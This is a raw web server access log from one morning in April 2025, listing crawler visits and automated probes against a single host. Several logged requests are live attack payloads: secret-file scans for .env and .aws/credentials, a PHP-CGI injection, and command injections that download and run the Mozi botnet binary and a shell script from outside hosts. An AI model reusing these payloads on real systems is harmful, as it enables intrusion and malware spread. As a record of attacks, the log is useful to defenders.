154.81.156.54 - - [27/Apr/2025:02:07:26 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.35 - - [27/Apr/2025:02:21:32 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
196.251.88.89 - - [27/Apr/2025:02:25:04 +0200] "GET /.git/config HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36"
154.81.156.54 - - [27/Apr/2025:02:43:47 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.255.122.19 - - [27/Apr/2025:02:52:44 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.242.226.116 - - [27/Apr/2025:02:59:18 +0200] "\x16\x03\x01" 400 383 "-" "-"
195.211.191.76 - - [27/Apr/2025:03:17:30 +0200] "GET /.git/config HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Linux; Android 6.0.1; SM-G900F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36"
154.81.156.7 - - [27/Apr/2025:03:22:01 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
185.218.86.4 - - [27/Apr/2025:03:22:15 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.54 - - [27/Apr/2025:03:22:46 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.218.84.178 - - [27/Apr/2025:03:25:08 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
164.52.24.188 - - [27/Apr/2025:03:37:08 +0200] "\x16\x03\x01\x02" 400 383 "-" "-"
164.52.24.188 - - [27/Apr/2025:03:37:27 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
185.16.38.107 - - [27/Apr/2025:03:48:27 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
88.214.25.123 - - [27/Apr/2025:03:49:12 +0200] "\x03" 400 383 "-" "-"
128.199.105.36 - - [27/Apr/2025:03:56:50 +0200] "POST /php-cgi/php-cgi.exe?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input HTTP/1.1" 404 287 "-" "Mozilla/5.0 (Windows; U; Windows NT 4.0) AppleWebKit/534.45.1 (KHTML, like Gecko) Version/4.1 Safari/534.45.1"
154.81.156.54 - - [27/Apr/2025:04:00:28 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
45.148.10.42 - - [27/Apr/2025:04:08:25 +0200] "\x16\x03\x01" 400 383 "-" "-"
45.148.10.42 - - [27/Apr/2025:04:08:25 +0200] "GET / HTTP/1.1" 400 383 "-" "-"
45.148.10.42 - - [27/Apr/2025:04:08:25 +0200] "GET / HTTP/1.1" 200 423 "-" "l9tcpid/v1.1.0"
45.148.10.42 - - [27/Apr/2025:04:08:26 +0200] "GET /.env.testing HTTP/1.1" 404 285 "-" "l9explore/1.2.2"
45.148.10.42 - - [27/Apr/2025:04:08:26 +0200] "GET /assets../.git/config HTTP/1.1" 404 291 "-" "l9explore/1.2.2"
45.148.10.42 - - [27/Apr/2025:04:08:26 +0200] "GET /config/.git/config HTTP/1.1" 404 288 "-" "l9explore/1.2.2"
45.148.10.42 - - [27/Apr/2025:04:08:26 +0200] "GET /.env.ci HTTP/1.1" 404 282 "-" "l9explore/1.2.2"
45.148.10.42 - - [27/Apr/2025:04:08:26 +0200] "GET /.env_sample HTTP/1.1" 404 285 "-" "l9explore/1.2.2"
45.148.10.42 - - [27/Apr/2025:04:08:26 +0200] "GET /.env.development.local HTTP/1.1" 404 292 "-" "l9explore/1.2.2"
45.148.10.42 - - [27/Apr/2025:04:08:26 +0200] "GET /project/.git/config HTTP/1.1" 404 291 "-" "l9explore/1.2.2"
45.148.10.42 - - [27/Apr/2025:04:08:26 +0200] "GET /server/.git/config HTTP/1.1" 404 288 "-" "l9explore/1.2.2"
45.148.10.42 - - [27/Apr/2025:04:08:26 +0200] "GET /.env.dist HTTP/1.1" 404 283 "-" "l9explore/1.2.2"
45.148.10.42 - - [27/Apr/2025:04:08:26 +0200] "GET /.env.test HTTP/1.1" 404 282 "-" "l9explore/1.2.2"
45.148.10.42 - - [27/Apr/2025:04:08:26 +0200] "GET /.env.backup HTTP/1.1" 404 285 "-" "l9explore/1.2.2"
45.148.10.42 - - [27/Apr/2025:04:08:26 +0200] "GET /.env.save HTTP/1.1" 404 283 "-" "l9explore/1.2.2"
45.148.10.42 - - [27/Apr/2025:04:08:26 +0200] "GET /.env.template HTTP/1.1" 404 285 "-" "l9explore/1.2.2"
45.148.10.42 - - [27/Apr/2025:04:08:26 +0200] "GET /data/.git/config HTTP/1.1" 404 288 "-" "l9explore/1.2.2"
45.148.10.42 - - [27/Apr/2025:04:08:27 +0200] "GET /media/.git/config HTTP/1.1" 404 289 "-" "l9explore/1.2.2"
45.148.10.42 - - [27/Apr/2025:04:08:27 +0200] "GET /.env.default HTTP/1.1" 404 285 "-" "l9explore/1.2.2"
45.148.10.42 - - [27/Apr/2025:04:08:27 +0200] "GET /.env.production HTTP/1.1" 404 287 "-" "l9explore/1.2.2"
45.148.10.42 - - [27/Apr/2025:04:08:27 +0200] "GET /.env.local HTTP/1.1" 404 284 "-" "l9explore/1.2.2"
45.148.10.42 - - [27/Apr/2025:04:08:27 +0200] "GET /dev/.git/config HTTP/1.1" 404 288 "-" "l9explore/1.2.2"
45.148.10.42 - - [27/Apr/2025:04:08:27 +0200] "GET /docker-compose.prod.yml HTTP/1.1" 404 294 "-" "l9explore/1.2.2"
45.148.10.42 - - [27/Apr/2025:04:08:27 +0200] "GET /.git/config HTTP/1.1" 404 285 "-" "l9explore/1.2.2"
45.148.10.42 - - [27/Apr/2025:04:08:27 +0200] "GET /.env.preprod HTTP/1.1" 404 285 "-" "l9explore/1.2.2"
45.148.10.42 - - [27/Apr/2025:04:08:27 +0200] "GET /build/.env HTTP/1.1" 404 284 "-" "l9explore/1.2.2"
45.148.10.42 - - [27/Apr/2025:04:08:27 +0200] "GET /cms/.git/config HTTP/1.1" 404 288 "-" "l9explore/1.2.2"
45.148.10.42 - - [27/Apr/2025:04:08:27 +0200] "GET /.env.dev HTTP/1.1" 404 282 "-" "l9explore/1.2.2"
45.148.10.42 - - [27/Apr/2025:04:08:27 +0200] "GET /.env.dev.local HTTP/1.1" 404 286 "-" "l9explore/1.2.2"
45.148.10.42 - - [27/Apr/2025:04:08:27 +0200] "GET /.env.stage HTTP/1.1" 404 284 "-" "l9explore/1.2.2"
45.148.10.42 - - [27/Apr/2025:04:08:27 +0200] "GET /.env.config HTTP/1.1" 404 285 "-" "l9explore/1.2.2"
45.148.10.42 - - [27/Apr/2025:04:08:28 +0200] "GET /.env.prod HTTP/1.1" 404 283 "-" "l9explore/1.2.2"
45.148.10.42 - - [27/Apr/2025:04:08:28 +0200] "GET /settings/.env HTTP/1.1" 404 286 "-" "l9explore/1.2.2"
45.148.10.42 - - [27/Apr/2025:04:08:28 +0200] "GET /src/.git/config HTTP/1.1" 404 288 "-" "l9explore/1.2.2"
45.148.10.42 - - [27/Apr/2025:04:08:28 +0200] "GET /static../.git/config HTTP/1.1" 404 291 "-" "l9explore/1.2.2"
45.148.10.42 - - [27/Apr/2025:04:08:28 +0200] "GET /api/.git/config HTTP/1.1" 404 288 "-" "l9explore/1.2.2"
45.148.10.42 - - [27/Apr/2025:04:08:28 +0200] "GET /.env.live HTTP/1.1" 404 283 "-" "l9explore/1.2.2"
45.148.10.42 - - [27/Apr/2025:04:08:28 +0200] "GET /configuration/.env HTTP/1.1" 404 290 "-" "l9explore/1.2.2"
45.148.10.42 - - [27/Apr/2025:04:08:28 +0200] "GET /config/.env HTTP/1.1" 404 285 "-" "l9explore/1.2.2"
45.148.10.42 - - [27/Apr/2025:04:08:28 +0200] "GET /media../.git/config HTTP/1.1" 404 290 "-" "l9explore/1.2.2"
45.148.10.42 - - [27/Apr/2025:04:08:28 +0200] "GET /.env.bak HTTP/1.1" 404 283 "-" "l9explore/1.2.2"
45.148.10.42 - - [27/Apr/2025:04:08:28 +0200] "GET /.env.production.local HTTP/1.1" 404 292 "-" "l9explore/1.2.2"
45.148.10.42 - - [27/Apr/2025:04:08:28 +0200] "GET /.env HTTP/1.1" 404 280 "-" "l9explore/1.2.2"
45.148.10.42 - - [27/Apr/2025:04:08:28 +0200] "GET /api/.env HTTP/1.1" 404 282 "-" "l9explore/1.2.2"
45.148.10.42 - - [27/Apr/2025:04:08:28 +0200] "GET /config.json HTTP/1.1" 404 285 "-" "l9explore/1.2.2"
45.148.10.42 - - [27/Apr/2025:04:08:28 +0200] "GET /admin/.git/config HTTP/1.1" 404 289 "-" "l9explore/1.2.2"
45.148.10.42 - - [27/Apr/2025:04:08:28 +0200] "GET /www/.git/config HTTP/1.1" 404 288 "-" "l9explore/1.2.2"
45.148.10.42 - - [27/Apr/2025:04:08:29 +0200] "GET /.env.sandbox HTTP/1.1" 404 286 "-" "l9explore/1.2.2"
45.148.10.42 - - [27/Apr/2025:04:08:29 +0200] "GET /.env.staging.local HTTP/1.1" 404 290 "-" "l9explore/1.2.2"
45.148.10.42 - - [27/Apr/2025:04:08:29 +0200] "GET /.env.uat HTTP/1.1" 404 282 "-" "l9explore/1.2.2"
45.148.10.42 - - [27/Apr/2025:04:08:29 +0200] "GET /core/.git/config HTTP/1.1" 404 288 "-" "l9explore/1.2.2"
45.148.10.42 - - [27/Apr/2025:04:08:29 +0200] "GET /.aws/credentials HTTP/1.1" 404 287 "-" "l9explore/1.2.2"
45.148.10.42 - - [27/Apr/2025:04:08:29 +0200] "GET /public/.git/config HTTP/1.1" 404 290 "-" "l9explore/1.2.2"
45.148.10.42 - - [27/Apr/2025:04:08:29 +0200] "GET /.env.secret HTTP/1.1" 404 284 "-" "l9explore/1.2.2"
45.148.10.42 - - [27/Apr/2025:04:08:29 +0200] "GET /app/.git/config HTTP/1.1" 404 288 "-" "l9explore/1.2.2"
45.148.10.42 - - [27/Apr/2025:04:08:29 +0200] "GET /files/.git/config HTTP/1.1" 404 289 "-" "l9explore/1.2.2"
45.148.10.42 - - [27/Apr/2025:04:08:29 +0200] "GET /prod/.env HTTP/1.1" 404 283 "-" "l9explore/1.2.2"
45.148.10.42 - - [27/Apr/2025:04:08:29 +0200] "GET /backup/.git/config HTTP/1.1" 404 291 "-" "l9explore/1.2.2"
185.255.122.19 - - [27/Apr/2025:04:16:42 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
43.130.91.95 - - [27/Apr/2025:04:32:52 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
154.81.156.35 - - [27/Apr/2025:04:41:17 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.54 - - [27/Apr/2025:04:41:48 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
20.65.195.48 - - [27/Apr/2025:05:04:07 +0200] "GET /actuator/health HTTP/1.1" 404 287 "-" "Mozilla/5.0 zgrab/0.x"
141.98.11.244 - - [27/Apr/2025:05:07:17 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
5.182.209.113 - - [27/Apr/2025:05:12:58 +0200] "\x16\x03\x01" 400 383 "-" "-"
5.182.209.113 - - [27/Apr/2025:05:12:58 +0200] "\x16\x03\x01" 400 383 "-" "-"
5.182.209.113 - - [27/Apr/2025:05:12:58 +0200] "\x16\x03\x01" 400 383 "-" "-"
5.182.209.113 - - [27/Apr/2025:05:12:58 +0200] "\x16\x03\x01" 400 383 "-" "-"
206.168.34.221 - - [27/Apr/2025:05:15:31 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
206.168.34.221 - - [27/Apr/2025:05:15:33 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
206.168.34.221 - - [27/Apr/2025:05:15:40 +0200] "GET /favicon.ico HTTP/1.1" 404 295 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
154.81.156.54 - - [27/Apr/2025:05:15:41 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
206.168.34.221 - - [27/Apr/2025:05:15:42 +0200] "PRI * HTTP/2.0" 400 383 "-" "-"
206.168.34.221 - - [27/Apr/2025:05:15:53 +0200] "GET /favicon.ico HTTP/1.1" 404 295 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
206.168.34.221 - - [27/Apr/2025:05:15:54 +0200] "\x16\x03\x01" 400 383 "-" "-"
93.174.93.12 - - [27/Apr/2025:05:19:08 +0200] "\x16\x03\x02\x01o\x01" 400 383 "-" "-"
185.16.38.107 - - [27/Apr/2025:05:22:07 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.255.122.19 - - [27/Apr/2025:05:26:06 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.218.86.4 - - [27/Apr/2025:05:45:12 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.54 - - [27/Apr/2025:05:58:54 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.218.84.178 - - [27/Apr/2025:05:59:32 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
198.235.24.162 - - [27/Apr/2025:06:15:16 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
195.191.219.132 - - [27/Apr/2025:06:15:18 +0200] "GET /robots.txt HTTP/1.1" 404 298 "-" "Mozilla/5.0 (compatible; MJ12bot/v2.0.0; http://mj12bot.com/)"
195.191.219.132 - - [27/Apr/2025:06:15:18 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; MJ12bot/v2.0.0; http://mj12bot.com/)"
185.16.38.107 - - [27/Apr/2025:06:22:41 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.7 - - [27/Apr/2025:06:27:35 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
154.81.156.54 - - [27/Apr/2025:06:28:31 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.255.122.19 - - [27/Apr/2025:06:35:39 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
44.220.188.43 - - [27/Apr/2025:06:42:53 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/58.0.3108.61 Safari/537.32"
154.81.156.35 - - [27/Apr/2025:06:43:13 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
35.233.83.194 - - [27/Apr/2025:06:49:23 +0200] "GET / HTTP/1.1" 200 274 "-" "python-requests/2.32.3"
147.185.132.189 - - [27/Apr/2025:06:57:00 +0200] "\x16\x03\x01" 400 383 "-" "-"
147.185.132.189 - - [27/Apr/2025:06:57:00 +0200] "\x16\x03\x01" 400 383 "-" "-"
154.81.156.54 - - [27/Apr/2025:07:02:06 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.255.122.19 - - [27/Apr/2025:07:11:16 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
205.210.31.91 - - [27/Apr/2025:07:29:01 +0200] "GET / HTTP/1.0" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
154.81.156.54 - - [27/Apr/2025:07:51:15 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
80.82.77.202 - - [27/Apr/2025:07:59:05 +0200] "\x16\x03\x02\x01o\x01" 400 383 "-" "-"
141.98.11.244 - - [27/Apr/2025:07:59:47 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
154.81.156.54 - - [27/Apr/2025:08:26:46 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
196.251.86.64 - - [27/Apr/2025:08:26:48 +0200] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36"
198.235.24.167 - - [27/Apr/2025:08:29:39 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
185.218.86.4 - - [27/Apr/2025:08:30:13 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
66.249.70.139 - - [27/Apr/2025:08:32:05 +0200] "GET /robots.txt HTTP/1.1" 404 298 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.16.38.107 - - [27/Apr/2025:08:36:32 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.255.122.19 - - [27/Apr/2025:08:38:37 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
196.251.87.86 - - [27/Apr/2025:08:48:21 +0200] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Linux; Android 8.0.0; SM-G930F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36"
154.81.156.54 - - [27/Apr/2025:09:03:07 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
114.227.52.179 - - [27/Apr/2025:09:05:18 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://114.227.52.179:44052/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 350 "-" "Hello, world"
185.218.84.178 - - [27/Apr/2025:09:06:48 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.35 - - [27/Apr/2025:09:12:32 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
64.62.197.118 - - [27/Apr/2025:09:14:30 +0200] "\x16\x03\x01" 400 383 "-" "-"
154.81.156.54 - - [27/Apr/2025:09:34:19 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.16.38.107 - - [27/Apr/2025:09:57:07 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
172.202.117.222 - - [27/Apr/2025:09:57:15 +0200] "GET /hudson HTTP/1.1" 404 280 "-" "Mozilla/5.0 zgrab/0.x"
37.139.5.66 - - [27/Apr/2025:10:00:18 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://193.35.18.164/klausschwab.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "linus-torvalds-loves-you"
154.81.156.54 - - [27/Apr/2025:10:04:05 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.255.122.19 - - [27/Apr/2025:10:08:29 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
162.216.149.91 - - [27/Apr/2025:10:11:42 +0200] "GET / HTTP/1.1" 200 274 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
147.182.192.11 - - [27/Apr/2025:10:35:34 +0200] "GET / HTTP/1.0" 200 423 "-" "-"
154.81.156.20 - - [27/Apr/2025:10:41:45 +0200] "\x16\x03\x01" 400 383 "-" "-"
154.81.156.20 - - [27/Apr/2025:10:41:45 +0200] "-" 408 - "-" "-"
154.81.156.20 - - [27/Apr/2025:10:41:55 +0200] "-" 408 - "-" "-"
159.65.81.103 - - [27/Apr/2025:10:44:10 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible)"
159.65.81.103 - - [27/Apr/2025:10:44:11 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "http://212.69.160.11/" "Mozilla/5.0 (compatible)"
93.174.93.12 - - [27/Apr/2025:10:49:27 +0200] "GET / HTTP/1.0" 200 423 "-" "Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/0.8.12"
80.82.77.202 - - [27/Apr/2025:10:54:45 +0200] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
154.81.156.54 - - [27/Apr/2025:10:58:14 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
163.61.110.122 - - [27/Apr/2025:11:10:00 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 293 "http://212.69.160.11:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
43.153.73.200 - - [27/Apr/2025:11:15:06 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
154.81.156.54 - - [27/Apr/2025:11:17:53 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
91.196.152.14 - - [27/Apr/2025:11:26:47 +0200] "\x16\x03\x03\x01\xa6\x01" 400 383 "-" "-"
91.196.152.14 - - [27/Apr/2025:11:26:50 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0"
185.218.84.178 - - [27/Apr/2025:11:26:52 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.35 - - [27/Apr/2025:11:29:28 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
91.196.152.121 - - [27/Apr/2025:11:33:08 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0"
185.255.122.19 - - [27/Apr/2025:11:42:36 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.218.86.4 - - [27/Apr/2025:11:45:48 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
167.94.138.119 - - [27/Apr/2025:12:08:05 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.119 - - [27/Apr/2025:12:08:08 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.119 - - [27/Apr/2025:12:08:13 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.119 - - [27/Apr/2025:12:08:15 +0200] "PRI * HTTP/2.0" 400 383 "-" "-"
